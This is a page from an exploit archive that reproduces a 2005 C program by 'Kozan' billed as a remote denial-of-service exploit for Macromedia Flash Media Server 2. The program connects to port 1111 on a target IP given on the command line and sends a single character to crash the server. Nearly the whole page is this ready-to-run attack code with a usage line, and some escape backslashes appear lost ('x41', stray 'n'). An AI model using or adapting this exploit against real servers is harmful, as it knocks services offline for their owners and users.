[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Macromedia Flash Media Server 2 Remote Denial of Service Exploit
# Published : 2005-12-14
# Author : Kozan
# Previous Title : MS Windows IIS Malformed HTTP Request Denial of Service Exploit (pl)
# Next Title : MS Internet Explorer 6.0 (pre tag multiple single tags) Denial of Service
/*****************************************************************
Macromedia Flash Media Server 2 Remote D.o.S Exploit by Kozan
Application: Macromedia Flash Media Server
http://www.macromedia.com/software/flashmediaserver/
Vendor: Macromedia
Discovered by: dr_insane
Exploit Coded by: Kozan
Credits to ATmaCA, dr_insane
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com
*****************************************************************/
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ws2_32.lib")
int nDefaultPort = 1111;
char SingleDoSChar[] = "x41";
int main(int argc, char *argv[])
{
fprintf(stdout, "nnMacromedia Flash Media Server 2 Remote D.o.S Exploit by Kozann");
fprintf(stdout, "Bug Discovered by: dr_insanen");
fprintf(stdout, "Exploit Coded by: Kozann");
fprintf(stdout, "Credits to ATmaCA, dr_insanen");
fprintf(stdout, "www.spyinstructors.com - kozan@spyinstructors.comnn");
if(argc<2)
{
fprintf(stderr, "Usage: %s [Target IP]nn", argv[0]);
return -1;
}
WSADATA wsaData;
SOCKET sock;
if( WSAStartup(0x0101,&wsaData) < 0 )
{
fprintf(stderr, "Winsock error!n");
return -1;
}
sock = socket(AF_INET,SOCK_STREAM,0);
if( sock == -1 )
{
fprintf(stderr, "Socket error!n");
return -1;
}
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(nDefaultPort);
addr.sin_addr.s_addr = inet_addr(argv[1]);
memset(&(addr.sin_zero), ' ', 8);
fprintf(stdout, "Please wait while connecting to server...n");
if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
{
fprintf(stderr, "Connection failed!n");
closesocket(sock);
return -1;
}
fprintf(stdout, "Please wait while sending single DoS char...n");
if( send(sock,SingleDoSChar,lstrlen(SingleDoSChar),0) == -1 )
{
fprintf(stderr, "DoS char could not sent!n");
closesocket(sock);
return -1;
}
fprintf(stdout, "Operation completed...n");
closesocket(sock);
WSACleanup();
return 0;
}
// www.Syue.com [2005-12-14]